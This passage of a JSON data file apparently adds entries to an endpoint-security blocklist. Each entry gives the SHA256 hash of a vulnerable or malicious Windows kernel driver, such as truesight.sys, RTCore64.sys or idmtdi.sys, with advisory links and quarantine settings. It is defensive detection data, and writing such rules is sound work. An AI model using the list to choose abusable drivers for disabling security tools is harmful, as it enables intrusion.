[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb39c2ca-80f5-58c5-9555-b265aa40d27d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835490Z", + "creation_date": "2026-03-23T11:45:30.835493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "234ed5418a8db6f989add54ef8823eb1b2e8e73b0cff0716d0554fbc4490acbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb4bb953-609d-5e38-a217-c30c06a53386", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478133Z", + "creation_date": 
"2026-03-23T11:45:30.478136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c812acb46a9d4b224cc20c70aeca969b00521123008cff8b1eb0367fdb0fc6b", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb659702-9041-585e-8777-c89347646f73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622967Z", + "creation_date": "2026-03-23T11:45:29.622969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8bf3bd441ebc5814c5d39d053fdcb263e8e58476cbdee4b1226903305f547b6", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"cb65b31f-dfdb-5b49-bc2b-23a672caa6fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828029Z", + "creation_date": "2026-03-23T11:45:30.828031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea9506eab19fbc25589a5e9058bb8be8c934ea88ab9ac62bee82627147e8506b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb716ac5-156b-5b0b-9c6c-8b788c89bdbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480979Z", + "creation_date": "2026-03-23T11:45:31.480983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.480993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95e37414577d94a018dd2da7f59a835b0619b4c40068e717cb4ce4bd5137ab0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb79aa74-d622-5b62-8cff-806de0e17034", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142892Z", + "creation_date": "2026-03-23T11:45:31.142894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c286d288c474ffb42d80fcc692ff747c51275c34653f5b1c63f1e75de378d8c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb7a572b-69ff-5d56-8b43-5c27f208735c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144447Z", + "creation_date": "2026-03-23T11:45:32.144449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144455Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37206b758eac2c7775ef881c1dc9a96129a517069bdf47049afc3b29e328408e", + "comment": "Vulnerable Kernel Driver (aka ProcObsrvesx.sys) [https://www.loldrivers.io/drivers/8a1a4a5d-3e41-4539-80cd-0cb751f7fab3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb8d06a9-8762-5ff2-a81f-94784b930102", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807502Z", + "creation_date": "2026-03-23T11:45:31.807504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807510Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "0e42755c0f27c6a89c6f101d28b0b43ca2899d543db85411a38449b96a9d49e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb944f3b-9895-5756-8ca4-93da3c9ef924", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455275Z", + "creation_date": "2026-03-23T11:45:30.455279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0391107305d76eb9ddf1a5b3b3c50da361e8ab35b573dbd19bf9383436b9303e", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb95ca08-7baf-5987-b7a3-b895aea9dfb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611619Z", + "creation_date": "2026-03-23T11:45:29.611621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62daa7ab93684d935cdada8af43cba552d7692cb992411d27ba1ee50a9fb1883", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb9c32ac-6f4b-5989-92f0-7e050265dc8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827367Z", + "creation_date": "2026-03-23T11:45:31.827369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8427775632e60b14264ada48a86c7f59fde2f4e5cbc46cf4768c87cf7ad5a84b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cba77143-c52c-5e2d-aaca-109fa5f1ce47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154431Z", + "creation_date": "2026-03-23T11:45:31.154433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c36037dedb296b6746f6ac6eea9b1a6eaa46eba4c49da895bcac79c39269a584", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbaaa024-cffd-52cf-ad0b-c8116f0f0195", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491902Z", + "creation_date": 
"2026-03-23T11:45:31.491904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecceaf72e18dba67f0537b50ff56b9dd2643616a27a22b8be498d2cd7de9a2c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbba6613-b8c4-59cb-91e1-6894293cbbcc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471912Z", + "creation_date": "2026-03-23T11:45:30.471915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65e3548bc09dffd550e79501e3fe0fee268f895908e2bba1aa5620eb9bdac52d", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbc35264-0230-534d-a3ea-7b5aa9697ae7", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154935Z", + "creation_date": "2026-03-23T11:45:31.154938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154943Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b16be2f9bfc6ba39d29e5aa1f82e035f303d8e246f5f06a2be12435eea5336e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbd1f43e-f659-5525-85e0-11b851834a3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143448Z", + "creation_date": "2026-03-23T11:45:32.143450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:32.143456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06967882fae2160cec07ea7b31685deefc61e1e6153ed8e87ee8a1f7086afc5b", + "comment": "Vulnerable Kernel Driver (aka GPU-Z.sys) [https://www.loldrivers.io/drivers/0d6f1b0f-b94d-4254-b3bb-49de61246260/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbd58266-f777-5dee-8499-06aea4427b09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476616Z", + "creation_date": "2026-03-23T11:45:30.476619Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d4cb02a826973521678309a0076b2fd50894c09dda87ca86089e815f4bc9bce", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbdbe2c5-110c-59a6-94aa-9d8b0b5b51a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160605Z", + "creation_date": "2026-03-23T11:45:31.160607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f6c9e43cb8e6af24315f57b638253c1d7f33793fdd879e6fb37a0e16b5a124b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbec168d-3db5-55df-aca8-f58e7124e4a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822800Z", + "creation_date": "2026-03-23T11:45:30.822802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1a34446a3d8b2875a505b109a1c78177f9fa887472699ec9db5147b1074e42f", 
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cbfd3ad2-30a8-5d43-8a3a-58dd34ad2527", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143278Z", + "creation_date": "2026-03-23T11:45:32.143280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143286Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f2cf1c9502c5c5054edb556827ba30ffc2e6689faf807db404672781b032eaf", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc0fb1a5-ab03-5a9e-9b99-23b4157bdc31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144239Z", + 
"creation_date": "2026-03-23T11:45:32.144242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce106afd6a9996ac0150709a30d61ece7d7bfe1f27492c00f4fabab9ec40575d", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc211c39-1c18-50b4-8fc4-19ab2100642c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460766Z", + "creation_date": "2026-03-23T11:45:30.460769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63af3fdb1e85949c8adccb43f09ca4556ae258b363a99ae599e1e834d34c8670", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc26991c-7a8d-5f32-8da1-2ac9bdaee044", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461412Z", + "creation_date": "2026-03-23T11:45:30.461416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c09dfc18959fe51d3e5ca1500a94ab74faf0eb72040930e89cdbac653df9e816", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc2ae10a-2b78-532c-b490-541ba4da7ce1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816730Z", + "creation_date": "2026-03-23T11:45:30.816732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8a34012c22a650972b9ecad988d346c8670bcd51ea2dd3ab7fe4562e117f1b9", + "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cc2d271c-83f8-5eb7-bd88-00f6fc15ceae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159925Z", + "creation_date": "2026-03-23T11:45:31.159927Z", + "enabled": true, + 